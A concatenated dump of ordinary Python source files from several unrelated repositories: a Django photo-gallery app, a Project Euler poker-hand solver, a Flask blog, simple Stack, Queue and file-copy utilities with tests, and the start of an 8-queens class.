username = forms.CharField(max_length=60)
password = forms.CharField(max_length=60)
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,187 | levithomason/sparrowbleu | refs/heads/master | /apps/sparrow_bleu/test_cases.py | from django.test import LiveServerTestCase
from nose.plugins.attrib import attr
from selenium.webdriver.firefox.webdriver import WebDriver
@attr(e2e=True)
class E2ETestCase(LiveServerTestCase):
@classmethod
def setUpClass(cls):
cls.driver = WebDriver()
# Implicitly wait means if we don't find an element automatically keep
# looking for 10 seconds
cls.driver.implicitly_wait(10)
super(E2ETestCase, cls).setUpClass()
@classmethod
def tearDownClass(cls):
super(E2ETestCase, cls).tearDownClass()
cls.driver.quit()
def get_remote(self, url):
self.driver.get(url)
def get_local(self, url):
'''
Automatically puts WebDriver url in front
Example:
self.get_local(reverse('home'))
'''
self.driver.get("%s%s" % (self.live_server_url, url))
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,188 | levithomason/sparrowbleu | refs/heads/master | /apps/galleries/forms.py | from django import forms
from apps.galleries.models import Gallery
class GalleryForm(forms.Form):
name = forms.CharField(max_length=60)
passcode = forms.CharField(max_length=60)
number_of_images = forms.IntegerField(min_value=0)
cost_per_extra_image = forms.IntegerField(min_value=0)
class GalleryImageForm(forms.Form):
gallery = forms.ModelChoiceField(Gallery.objects.all())
full_size_url = forms.URLField(max_length=200)
name = forms.CharField(max_length=100)
s3_object_name = forms.CharField(max_length=200)
class ClientAccessForm(forms.Form):
passcode = forms.CharField(max_length=60)
is_mobile = forms.BooleanField(required=False)
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,189 | levithomason/sparrowbleu | refs/heads/master | /apps/sparrow_bleu/tests/test_basic.py | from django.core.urlresolvers import reverse
from sparrow_bleu.test_cases import E2ETestCase
class BasicTest(E2ETestCase):
def test_index(self):
self.get_local(reverse('home'))
self.assertIn('client-access', self.driver.current_url)
brand_logo = self.driver.find_element_by_id('brand_sparrow_bleu')
self.assertTrue(brand_logo)
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,190 | levithomason/sparrowbleu | refs/heads/master | /apps/galleries/tasks.py | from __future__ import absolute_import
from celery import shared_task
# TODO: figure out why using 'from django.conf import settings' here throws boto_bucket not found
from settings import *
from django.core import management
@shared_task(name="delete_gallery_images")
def delete_gallery_images(gallery_pk):
key_prefix = "%s" % gallery_pk
for key in boto_bucket.list(prefix=key_prefix):
key.delete()
management.call_command('thumbnail', 'cleanup')
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,191 | levithomason/sparrowbleu | refs/heads/master | /apps/user/urls.py | from django.conf.urls import patterns, include, url
urlpatterns = patterns('',
url(r'^user_login', 'apps.user.views.user_login', name='user_login'),
url(r'^user_logout', 'apps.user.views.user_logout', name='user_logout'),
) | {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,201 | wegotas/euler_problem_54 | refs/heads/master | /main.py | from classes import *
round_playment = RoundPlayment()
with open("poker.txt") as input_data:
for line in input_data.readlines():
round_playment.set_new_players(line)
round_playment.play()
print('player {0} won {1} times'.format(round_playment.first_player_name,
round_playment.first_player_winning_count))
print('player {0} won {1} times'.format(round_playment.second_player_name,
round_playment.second_player_winning_count))
| {"/main.py": ["/classes.py"]} |
78,202 | wegotas/euler_problem_54 | refs/heads/master | /classes.py | class RoundPlayment:
def __init__(self):
self.first_player_name = 'John Doe'
self.first_player_hand = None
self.first_player_winning_count = 0
self.second_player_name = 'Jane Doe'
self.second_player_hand = None
self.second_player_winning_count = 0
def set_new_players(self, card_string):
card_string_array = card_string.strip().replace('ï', '').replace('»', '').replace('¿', '').split(' ')
self.first_player_hand = PlayerHand(
player_name=self.first_player_name,
first_card_string=card_string_array[0],
second_card_string=card_string_array[1],
third_card_string=card_string_array[2],
fourth_card_string=card_string_array[3],
fifth_card_string=card_string_array[4]
)
self.second_player_hand = PlayerHand(
player_name=self.second_player_name,
first_card_string=card_string_array[5],
second_card_string=card_string_array[6],
third_card_string=card_string_array[7],
fourth_card_string=card_string_array[8],
fifth_card_string=card_string_array[9]
)
def play(self):
for method_to_call in PlayerHand.methods_to_call:
winner_found, winner = self._compare_combo(method_to_call)
if winner_found:
if winner:
if winner.player_name == self.first_player_name:
self.first_player_winning_count += 1
elif winner.player_name == self.second_player_name:
self.second_player_winning_count +=1
break
def _compare_combo(self, method_to_call):
# shortenings - fp(first player), sp(second player)
fp_is, fp_first_value, fp_second_value, fp_third_value, fp_fourth_value, fp_fifth_value = getattr(
self.first_player_hand, method_to_call)()
fp_values = [fp_first_value, fp_second_value, fp_third_value, fp_fourth_value, fp_fifth_value]
sp_is, sp_first_value, sp_second_value, sp_third_value, sp_fourth_value, sp_fifth_value = getattr(
self.second_player_hand, method_to_call)()
sp_values = [sp_first_value, sp_second_value, sp_third_value, sp_fourth_value, sp_fifth_value]
if fp_is and sp_is:
# combo tie braker
for fp_value, sp_value in zip(fp_values, sp_values):
if fp_value and sp_value:
if fp_value > sp_value:
return True, self.first_player_hand
elif sp_value > fp_value:
return True, self.second_player_hand
return False, None
elif fp_is and not sp_is:
return True, self.first_player_hand
elif not fp_is and sp_is:
return True, self.second_player_hand
# No one wins this combo comparison
return False, None
class PlayerHand:
methods_to_call = [
'check_royal_flush',
'check_straight_flush',
'check_four_of_a_kind',
'check_full_house',
'check_flush',
'check_straight',
'check_three_of_a_kind',
'check_two_pairs',
'check_pair',
'check_high_card'
]
def __init__(self, first_card_string, second_card_string, third_card_string,
fourth_card_string, fifth_card_string, player_name='Unnamed player'):
self.player_name = player_name
self.hand = [
Card(first_card_string),
Card(second_card_string),
Card(third_card_string),
Card(fourth_card_string),
Card(fifth_card_string)
]
def is_royal_flush(self):
royal_flush_combo = ['A', 'K', 'Q', 'J', 'T']
for card in self.hand:
if card.value in royal_flush_combo:
royal_flush_combo.remove(card.value)
else:
return False
return True
def check_royal_flush(self):
return self.is_royal_flush(), None, None, None, None, None
def is_straight_flush(self):
sorted_hand =self.sorted_value_list
for indx in range(len(sorted_hand)-1):
if abs(sorted_hand[indx].value_as_int - sorted_hand[indx + 1].value_as_int) != 1 \
or sorted_hand[indx].symbol != sorted_hand[indx + 1].symbol:
return False
return True
def check_straight_flush(self):
return self.is_straight_flush(), self.values_list_as_ints[0], None, None, None, None
def is_four_of_a_kind(self):
return 4 in self._get_value_pairs().values()
def check_four_of_a_kind(self):
four_of_a_kind_value_as_int = None
sigleton_int = None
four_of_a_kind_value_key = None
is_four_of_a_kind = self.is_four_of_a_kind()
if is_four_of_a_kind:
value_pairs = self._get_value_pairs()
for key, value in value_pairs.items():
if value==4:
four_of_a_kind_value_key = key
four_of_a_kind_value_as_int = Card.values_as_ints[key]
value_pairs.pop(four_of_a_kind_value_key)
sigleton_int = Card.values_as_ints[list(value_pairs.keys())[0]]
return is_four_of_a_kind, four_of_a_kind_value_as_int, sigleton_int, None, None, None
def is_full_house(self):
value_pairs = self._get_value_pairs()
return 3 in value_pairs.values() and 2 in value_pairs.values()
def check_full_house(self):
three_of_a_kind_value_as_int = None
two_of_a_kind_value_as_int = None
three_of_a_kind_value_key = None
is_full_house = self.is_full_house()
if is_full_house:
value_pairs = self._get_value_pairs()
for key, value in value_pairs.items():
if value==3:
three_of_a_kind_value_key = key
three_of_a_kind_value_as_int = Card.values_as_ints[key]
value_pairs.pop(three_of_a_kind_value_key)
two_of_a_kind_value_as_int = Card.values_as_ints[list(value_pairs.keys())[0]]
return is_full_house, three_of_a_kind_value_as_int, two_of_a_kind_value_as_int, None, None, None
def is_flush(self):
symbol = self.hand[0].symbol
for card in self.hand[2:]:
if symbol != card.symbol:
return False
return True
def check_flush(self):
values_list_as_ints = self.values_list_as_ints
return self.is_flush(), values_list_as_ints[0], values_list_as_ints[1], values_list_as_ints[2], \
values_list_as_ints[3], values_list_as_ints[4]
def is_straight(self):
values_list_as_ints = self.values_list_as_ints
for indx in range(len(values_list_as_ints) - 1):
if abs(values_list_as_ints[indx] - values_list_as_ints[indx + 1]) != 1:
return False
return True
def check_straight(self):
return self.is_straight(), self.values_list_as_ints[0], None, None, None, None
def is_three_of_a_kind(self):
return 3 in self._get_value_pairs().values()
def check_three_of_a_kind(self):
three_of_a_kind_value_as_int = None
three_of_a_kind_value_key = None
higher_value = None
lower_value = None
is_three_of_a_kind = self.is_three_of_a_kind()
if is_three_of_a_kind:
value_pairs = self._get_value_pairs()
for key, value in value_pairs.items():
if value == 3:
three_of_a_kind_value_key = key
three_of_a_kind_value_as_int = Card.values_as_ints[key]
value_pairs.pop(three_of_a_kind_value_key)
if Card.values_as_ints[list(value_pairs.keys())[0]] > Card.values_as_ints[list(value_pairs.keys())[1]]:
higher_value = Card.values_as_ints[list(value_pairs.keys())[0]]
lower_value = Card.values_as_ints[list(value_pairs.keys())[1]]
else:
higher_value = Card.values_as_ints[list(value_pairs.keys())[1]]
lower_value = Card.values_as_ints[list(value_pairs.keys())[0]]
return is_three_of_a_kind, three_of_a_kind_value_as_int, higher_value, lower_value, None, None
def is_two_pairs(self):
counter = 0
for value in self._get_value_pairs().values():
if value == 2:
counter += 1
return counter == 2
def check_two_pairs(self):
is_two_pairs = self.is_two_pairs()
higher_pair_value = None
lower_pair_value = None
singleton = None
if is_two_pairs:
values_of_pairs = []
for value, qty in self._get_value_pairs().items():
if qty == 2:
values_of_pairs.append(value)
if Card.values_as_ints[values_of_pairs[0]] > Card.values_as_ints[values_of_pairs[1]]:
higher_pair_value = Card.values_as_ints[values_of_pairs[0]]
lower_pair_value = Card.values_as_ints[values_of_pairs[1]]
else:
higher_pair_value = Card.values_as_ints[values_of_pairs[1]]
lower_pair_value = Card.values_as_ints[values_of_pairs[0]]
return is_two_pairs, higher_pair_value, lower_pair_value, singleton, None, None
def is_pair(self):
for value in self._get_value_pairs().values():
if value == 2:
return True
return False
def check_pair(self):
def singletons_as_ints(singletons_values):
return sorted([Card.values_as_ints[singleton] for singleton in singletons], reverse=True)
is_pair = self.is_pair()
pair_value_as_int = None
higher_value = None
mid_value = None
lower_value = None
if is_pair and not self.is_full_house() and not self.is_two_pairs():
singletons = []
for value, qty in self._get_value_pairs().items():
if qty == 2:
pair_value_as_int = Card.values_as_ints[value]
elif qty == 1:
singletons.append(value)
higher_value, mid_value, lower_value = singletons_as_ints(singletons)
return is_pair, pair_value_as_int, higher_value, mid_value, lower_value, None
def is_high_card(self):
return True
def check_high_card(self):
values_list_as_ints = self.values_list_as_ints
return self.is_high_card(), values_list_as_ints[0], values_list_as_ints[1], values_list_as_ints[2], \
values_list_as_ints[3], values_list_as_ints[4]
@property
def winning_text(self):
return "{0} has won the round".format(self.player_name)
def _get_value_pairs(self):
value_pairs = {}
for card in self.hand:
if card.value in value_pairs:
value_pairs[card.value] += 1
else:
value_pairs[card.value] = 1
return value_pairs
@property
def values_list(self):
return [card.value for card in self.sorted_value_list]
@property
def values_list_as_ints(self):
return [card.value_as_int for card in self.sorted_value_list]
@property
def sorted_value_list(self):
return sorted(self.hand, key=lambda x: x.value_as_int, reverse=True)
def __repr__(self):
return "First card: {0},\r\nSecond card: {1},\r\nThird card: {2},\r\nFourth card: {3},\r\nFifth card: {4}"\
.format(self.hand[0], self.hand[1], self.hand[2], self.hand[3], self.hand[4])
class Card:
"""
Expected
values: A - Ace, K - King, Q - Queen, J - Jack, T - Ten, 9, 8, 7, 6, 5, 4, 3, 2
symbols: C - Club, D - Diamond, H - Heart, S - Spade
"""
values_as_ints = {'A': 14, 'K': 13,'Q': 12,'J': 11,'T': 10,'9': 9,'8': 8,'7': 7,'6': 6,'5': 5,'4': 4,'3': 3,'2': 2}
def __init__(self, card_string):
self.value = card_string[0]
self.symbol = card_string[1]
@property
def value_as_int(self):
return self.values_as_ints[self.value]
def __repr__(self):
return "Card class, Value: {0}, Symbol: {1}".format(self.value, self.symbol) | {"/main.py": ["/classes.py"]} |
78,203 | tyronedamasceno/flask-blog | refs/heads/master | /flask_blog/db_populator.py | import random
from faker import Faker
from flask_blog import db
from flask_blog.models import User, Post
fake = Faker()
for i in range(10):
author_user = random.choice(User.query.all())
title = fake.sentence()
content = ' '.join(fake.paragraphs(3))
p = Post(user_id=author_user.id, title=title, content=content)
db.session.add(p)
db.session.commit()
| {"/flask_blog/db_populator.py": ["/flask_blog/__init__.py", "/flask_blog/models.py"], "/flask_blog/models.py": ["/flask_blog/__init__.py"]} |
78,204 | tyronedamasceno/flask-blog | refs/heads/master | /flask_blog/__init__.py | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_bcrypt import Bcrypt
from flask_login import LoginManager
from flask_mail import Mail
from flask_blog.config import Config
db = SQLAlchemy()
bcrypt = Bcrypt()
login_manager = LoginManager()
login_manager.login_view = 'users.login'
login_manager.login_message_category = 'info'
mail = Mail()
def create_app(config_class=Config):
app = Flask(__name__)
app.config.from_object(Config)
db.init_app(app)
bcrypt.init_app(app)
login_manager.init_app(app)
mail.init_app(app)
# import after flask app iniatilization for avoid circular imports
from flask_blog.users.routes import users as users_bp
from flask_blog.posts.routes import posts as posts_bp
from flask_blog.main.routes import main as main_bp
from flask_blog.errors.handlers import errors as errors_bp
app.register_blueprint(users_bp)
app.register_blueprint(posts_bp)
app.register_blueprint(main_bp)
app.register_blueprint(errors_bp)
return app
| {"/flask_blog/db_populator.py": ["/flask_blog/__init__.py", "/flask_blog/models.py"], "/flask_blog/models.py": ["/flask_blog/__init__.py"]} |
78,205 | tyronedamasceno/flask-blog | refs/heads/master | /flask_blog/models.py | from datetime import datetime
from flask import current_app
from itsdangerous import (
SignatureExpired, TimedJSONWebSignatureSerializer as Serializer
)
from flask_blog import db, login_manager
from flask_login import UserMixin
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class User(db.Model, UserMixin):
id = db.Column(
db.Integer,
primary_key=True
)
username = db.Column(
db.String(20),
unique=True,
nullable=False
)
email = db.Column(
db.String(100),
unique=True,
nullable=False
)
image_file = db.Column(
db.String(20),
nullable=False,
default='default.jpg'
)
password = db.Column(
db.String(60),
nullable=False
)
posts = db.relationship(
'Post',
backref='author',
lazy=True
)
def get_reset_token(self, expires_sec=1800):
s = Serializer(current_app.config['SECRET_KEY'], expires_sec)
return s.dumps({'user_id': self.id}).decode('utf-8')
@staticmethod
def verify_reset_token(token):
s = Serializer(current_app.config['SECRET_KEY'])
try:
user_id = s.loads(token)['user_id']
except SignatureExpired:
return None
return User.query.get(user_id)
def __repr__(self):
return f'User("{self.username}", "{self.email}", "{self.image_file}")'
class Post(db.Model):
id = db.Column(
db.Integer,
primary_key=True
)
title = db.Column(
db.String(100),
nullable=False
)
date_posted = db.Column(
db.DateTime,
nullable=False,
default=datetime.utcnow # give the function as argument
)
content = db.Column(
db.Text,
nullable=False
)
user_id = db.Column(
db.Integer,
db.ForeignKey('user.id'),
nullable=False
)
def __repr__(self):
return f'Post("{self.title}", "{self.date_posted}")'
| {"/flask_blog/db_populator.py": ["/flask_blog/__init__.py", "/flask_blog/models.py"], "/flask_blog/models.py": ["/flask_blog/__init__.py"]} |
78,210 | mhmdmar/Python_Utils | refs/heads/master | /Stack.py | class Stack:
def __init__(self):
self.stack = []
def isEmpty(self):
return self.peek() == None
def peek(self):
if len(self.stack) == 0:
return None
return self.stack[len(self.stack)-1]
def pop(self):
if self.isEmpty() == False:
return self.stack.pop()
def sizeOf(self):
return len(self.stack)
def push(self, *values):
for value in values:
self._push(value)
return self
def _push(self, item):
self.stack.append(item)
def toArray(self):
return self.stack[:] # return new copy of the array
def toString(self):
return str(self.stack)
| {"/QueueTests.py": ["/Queue.py", "/TestEngine.py"], "/FilesTests.py": ["/Files.py", "/TestEngine.py"], "/Tests.py": ["/StackTests.py", "/QueueTests.py", "/FilesTests.py"], "/StackTests.py": ["/Stack.py", "/TestEngine.py"]} |
78,211 | mhmdmar/Python_Utils | refs/heads/master | /TestEngine.py | class TestEngine:
def __init__(self, name, tests, preTests=None, postTests=None):
self.name = name
self.preTests = preTests
self.postTests = postTests
self.tests = tests
def runTests(self):
failedTests = 0
testsNumber = len(self.tests)
if self.preTests != None:
self.preTests()
for test in self.tests:
if test() == False:
failedTests += 1
result = "Fail"
print("'"+test.__name__+"'", "test", "failed")
print(self.name + " test passed -",
testsNumber - failedTests, "/", testsNumber)
if self.postTests != None:
self.postTests()
def addTest(self, test):
self.tests.append(test)
def removeTest(self, test):
for test in self.tests:
print(test)
| {"/QueueTests.py": ["/Queue.py", "/TestEngine.py"], "/FilesTests.py": ["/Files.py", "/TestEngine.py"], "/Tests.py": ["/StackTests.py", "/QueueTests.py", "/FilesTests.py"], "/StackTests.py": ["/Stack.py", "/TestEngine.py"]} |
78,212 | mhmdmar/Python_Utils | refs/heads/master | /QueueTests.py | from Queue import Queue
from TestEngine import TestEngine
def toStringTest():
try:
queue = Queue()
queue.enqueue(1).enqueue(2).enqueue(3)
testPass = queue.toString() == "[3, 2, 1]"
except:
testPass = False
finally:
return testPass
def toArrayTest():
try:
queue = Queue()
queue.enqueue(1).enqueue(2).enqueue(3)
testPass = queue.toArray() == [3, 2, 1]
except:
testPass = False
finally:
return testPass
def isEmptyTest():
try:
queue = Queue()
queue.enqueue(1).enqueue(2).enqueue(3)
queue.dequeue()
queue.dequeue()
queue.dequeue()
testPass = queue.isEmpty() == True
except:
testPass = False
finally:
return testPass
def queueTest():
try:
queue = Queue()
queue.enqueue(1)
queue.enqueue(2)
testPass = queue.toString() == "[2, 1]"
except:
testPass = False
finally:
return testPass
def queueChainTest():
try:
queue = Queue()
queue.enqueue(1).enqueue(2).enqueue(3).enqueue(4)
testPass = queue.toString() == "[4, 3, 2, 1]"
except:
testPass = False
finally:
return testPass
def multipleQueueTest():
try:
queue = Queue()
queue.enqueue(1, 2, 3)
testPass = queue.toString() == "[3, 2, 1]"
except:
testPass = False
finally:
return testPass
def peekTest1():
try:
queue = Queue()
testPass = queue.peek() == None
except:
testPass = False
finally:
return testPass
def peekTest2():
try:
queue = Queue()
queue.enqueue(2)
testPass = queue.peek() == 2
except:
testPass = False
finally:
return testPass
def sizeTest():
try:
queue = Queue()
queue.enqueue(2)
testPass = queue.sizeOf() == 1
except:
testPass = False
finally:
return testPass
def getTests():
return [toStringTest, toArrayTest, multipleQueueTest, queueTest,
queueChainTest, isEmptyTest, peekTest1, peekTest2, sizeTest]
def main():
testEngine = TestEngine("Queue", getTests())
testEngine.runTests()
main()
| {"/QueueTests.py": ["/Queue.py", "/TestEngine.py"], "/FilesTests.py": ["/Files.py", "/TestEngine.py"], "/Tests.py": ["/StackTests.py", "/QueueTests.py", "/FilesTests.py"], "/StackTests.py": ["/Stack.py", "/TestEngine.py"]} |
78,213 | mhmdmar/Python_Utils | refs/heads/master | /Queue.py | class Queue:
def __init__(self):
self.queue = []
def isEmpty(self):
return self.queue == []
def enqueue(self, *items):
for item in items:
self._enqueue(item)
return self
def _enqueue(self, item):
self.queue.append(item)
def dequeue(self):
return self.queue.pop()
def sizeOf(self):
return len(self.queue)
def toArray(self):
return self.queue[::-1] # return new copy of the array
def toString(self):
return str(self.toArray())
def peek(self):
if(self.isEmpty()):
return None
else:
return self.queue[0]
| {"/QueueTests.py": ["/Queue.py", "/TestEngine.py"], "/FilesTests.py": ["/Files.py", "/TestEngine.py"], "/Tests.py": ["/StackTests.py", "/QueueTests.py", "/FilesTests.py"], "/StackTests.py": ["/Stack.py", "/TestEngine.py"]} |
78,214 | mhmdmar/Python_Utils | refs/heads/master | /FilesTests.py | import os
from Files import Files
from TestEngine import TestEngine
files = Files()
def createDirectoryTest():
files._createDirectory("./AA/BB/CC")
return os.path.exists("./AA/BB/CC")
def copyDirectoryTest():
testPass = False
try:
files.copyDirectory("./AA/BB/CC/fff/f.js", "./AA/BB/CC/fff/f.js")
except FileNotFoundError:
testPass = True
finally:
return testPass
def splitPathTest():
foldersArr, foldersLen = files._splitPath("AA/BB/CC/ff.js", True)
return foldersLen == 4 and foldersArr[0] == "AA" and foldersArr[1] == "BB" and foldersArr[2] == "CC" and foldersArr[3] == "ff.js"
testPass = False
def pathIncludesFileTest1():
return files._pathIncludesAFile("./AA/BB/CC") == False
def fixSeperatorTets():
slash = files._fixSeperators("./AA/BB")
backSlash = files._fixSeperators(".\\AA\\BB")
return slash == backSlash
def pathIncludesFileTest2():
return files._pathIncludesAFile("./AA/BB/CC/ff.txt") == True
def appendFileToPathTest():
result = files._appendFileToPath(
"./AA/BB/CC/ff.js", "./AA/BB").split(files.seperator)
return len(result) == 4 and result[3] == "ff.js"
def appendFileToPathTest2():
testPassed = False
try:
files._appendFileToPath("./AA/BB/CC", "./AA/BB").split(files.seperator)
except ValueError:
testPassed = True
finally:
return testPassed
def appendFileToPathTest3():
testPassed = False
try:
files._appendFileToPath(
"./AA/BB/CC/ff.js", "./AA/BB/ff.js").split(files.seperator)
except ValueError:
testPassed = True
finally:
return testPassed
def copyFileTest():
# copy to the same directory with the same name error
testPassed = False
try:
files.copyFile("./ff.txt", "./")
except ValueError:
testPassed = True
finally:
return testPassed
def copyFileTest2():
# copy to the same directory with diffrent name
testPassed = False
try:
files.copyFile("./ff.txt", "./aa.txt")
testPassed = os.path.exists("./aa.txt")
except ValueError:
testPassed = False
finally:
return testPassed
def copyFileTest3():
# copy to path with the same file name
try:
files.copyFile("./ff.txt", "./AA/BB/CC")
return os.path.exists("./AA/BB/CC/ff.txt")
except:
return False
def copyFileTest4():
# copy to path
try:
files.copyFile("./ff.txt", "./AA/BB/CC/aa.txt")
return os.path.exists("./AA/BB/CC/aa.txt")
except:
return False
def copyFileTest5():
# Source path doens't include a file
testPassed = False
try:
files.copyFile("./AA", "./AA/BB/CC/aa.txt")
except ValueError:
testPassed = True
finally:
return testPassed
def copyFileTest6():
# Source file doesn't exists
testPassed = False
try:
files.copyFile("./AA/savsabvsabvabva.txt", "./AA/BB/CC/aa.txt")
except FileNotFoundError:
testPassed = True
finally:
return testPassed
def preTests():
if not os.path.exists("./AA/BB/CC"):
os.makedirs("./AA/BB/CC")
with open("./ff.txt", "w") as file:
file.write("")
def postTests():
files.removeDirectory("./AA")
os.remove("./ff.txt")
os.remove("./aa.txt")
def getTests():
return [createDirectoryTest, copyDirectoryTest, splitPathTest,
pathIncludesFileTest1, pathIncludesFileTest2, appendFileToPathTest, appendFileToPathTest2, appendFileToPathTest3, fixSeperatorTets, copyFileTest, copyFileTest2, copyFileTest3, copyFileTest4, copyFileTest5, copyFileTest6]
def main():
testEngine = TestEngine("Files", getTests(), preTests, postTests)
testEngine.runTests()
main()
| {"/QueueTests.py": ["/Queue.py", "/TestEngine.py"], "/FilesTests.py": ["/Files.py", "/TestEngine.py"], "/Tests.py": ["/StackTests.py", "/QueueTests.py", "/FilesTests.py"], "/StackTests.py": ["/Stack.py", "/TestEngine.py"]} |
78,215 | mhmdmar/Python_Utils | refs/heads/master | /Files.py | import os
import shutil
class Files:
def __init__(self):
self.seperator = os.path.sep
def copyDirectory(self, source, dest):
if not os.path.exists(source):
raise FileNotFoundError("Source directory doesn't' exists")
self._copyDirectory(source, dest)
def _copyDirectory(self, source, dest):
if not os.path.exists(dest):
os.makedirs(dest)
for file in os.listdir(source):
s = os.path.join(source, file)
d = os.path.join(dest, file)
if os.path.isdir(s):
copyDirectory(s, d)
else:
if not os.path.exists(d) or os.stat(s).st_mtime - os.stat(d).st_mtime > 1:
shutil.copyfile(s, d)
self._copyDirectory(source, dest)
def removeDirectory(self, target):
if os.path.exists(target):
self._removeDirectory(target)
def _removeDirectory(self, target):
shutil.rmtree(target)
def _fixSeperators(self, path):
### Return the path with seperator changed to the current OS seperator ###
return path.replace("\\", self.seperator).replace(
"/", self.seperator)
def _splitPath(self, path, includeFile=True):
foldersArr = self._fixSeperators(path).split(self.seperator)
foldersLen = len(foldersArr)
# ignore the last part of the path if it represents a file
if includeFile == False and self._pathIncludesAFile(path) == True:
foldersLen -= 1
return foldersArr, foldersLen
def _createDirectory(self, path):
### Create all missing folders direcotries in the path ###
foldersArr, foldersLen = self._splitPath(path, False)
newPath = ""
for i in range(foldersLen):
newPath += (foldersArr[i]+"\\")
if not os.path.exists(newPath):
os.makedirs(newPath)
def _pathIncludesAFile(self, path):
path = self._fixSeperators(path)
foldersArr, foldersLen = self._splitPath(path)
return foldersArr[foldersLen-1].find(".") != -1
def _appendFileToPath(self, source, dest):
if self._pathIncludesAFile(dest) == True:
raise ValueError(
"Destination path already includes a file")
if self._pathIncludesAFile(source) == False:
raise ValueError(
"Source doesn't include a file to append to dest argumnet")
foldersArr, foldersLen = self._splitPath(source, True)
dest = self._fixSeperators(dest)
if not (dest[len(dest)-1] == self.seperator):
dest += self.seperator
dest += foldersArr[foldersLen-1]
return dest
def copyFile(self, source, dest):
source = self._fixSeperators(source)
dest = self._fixSeperators(dest)
if self._pathIncludesAFile(source) == False:
raise ValueError(
"Source doesn't include a file to copy, use copyDirectory instead")
if not os.path.exists(source):
raise FileNotFoundError("Source file doesn't exists")
if self._pathIncludesAFile(dest) == False:
dest = self._appendFileToPath(source, dest)
if source == dest: # make sure we dont copy the file to the same directory with the same name
raise ValueError(
"Copying the file with the same name to the same directory!")
self._createDirectory(dest)
shutil.copyfile(source, dest)
| {"/QueueTests.py": ["/Queue.py", "/TestEngine.py"], "/FilesTests.py": ["/Files.py", "/TestEngine.py"], "/Tests.py": ["/StackTests.py", "/QueueTests.py", "/FilesTests.py"], "/StackTests.py": ["/Stack.py", "/TestEngine.py"]} |
78,216 | mhmdmar/Python_Utils | refs/heads/master | /Tests.py | from StackTests import main
from QueueTests import main
from FilesTests import main
| {"/QueueTests.py": ["/Queue.py", "/TestEngine.py"], "/FilesTests.py": ["/Files.py", "/TestEngine.py"], "/Tests.py": ["/StackTests.py", "/QueueTests.py", "/FilesTests.py"], "/StackTests.py": ["/Stack.py", "/TestEngine.py"]} |
78,217 | mhmdmar/Python_Utils | refs/heads/master | /StackTests.py | from Stack import Stack
from TestEngine import TestEngine
def toStringTest():
try:
stack = Stack()
stack.push(1).push(2).push(3)
testPass = stack.toString() == "[1, 2, 3]"
except:
testPass = False
finally:
return testPass
def toArrayTest():
testPass = True
try:
stack = Stack()
stack.push(1).push(2).push(3)
stack.toArray() == [1, 2, 3]
except:
testPass = False
finally:
return testPass
def isEmptyTest():
try:
stack = Stack()
stack.push(1).push(2).push(3)
stack.pop()
stack.pop()
stack.pop()
testPass = stack.isEmpty() == True
except:
testPass = False
finally:
return testPass
def peekTest1():
try:
stack = Stack()
testPass = stack.peek() == None
except:
testPass = False
finally:
return testPass
def peekTest2():
try:
stack = Stack()
stack.push(2)
testPass = stack.peek() == 2
except:
testPass = False
finally:
return testPass
def sizeTest():
try:
stack = Stack()
stack.push(2)
testPass = stack.sizeOf() == 1
except:
testPass = False
finally:
return testPass
def getTests():
return [toStringTest, toArrayTest,
isEmptyTest, peekTest1, peekTest2, sizeTest]
def main():
testEngine = TestEngine("Stack", getTests())
testEngine.runTests()
main()
| {"/QueueTests.py": ["/Queue.py", "/TestEngine.py"], "/FilesTests.py": ["/Files.py", "/TestEngine.py"], "/Tests.py": ["/StackTests.py", "/QueueTests.py", "/FilesTests.py"], "/StackTests.py": ["/Stack.py", "/TestEngine.py"]} |
78,223 | Me-TheKing/8Queen | refs/heads/main | /queen.py | class Queen:
def __init__(self, y, x, board_size):
self.x = x
self.y = y
self.max = board_size
self.min = 0
def right(self):
return [(self.y, r) for r in range(self.x+1, self.max)]
def left(self):
return [(self.y, l-1) for l in range(self.x, self.min, -1)]
def hor(self):
return self.left() + self.right()
def up(self):
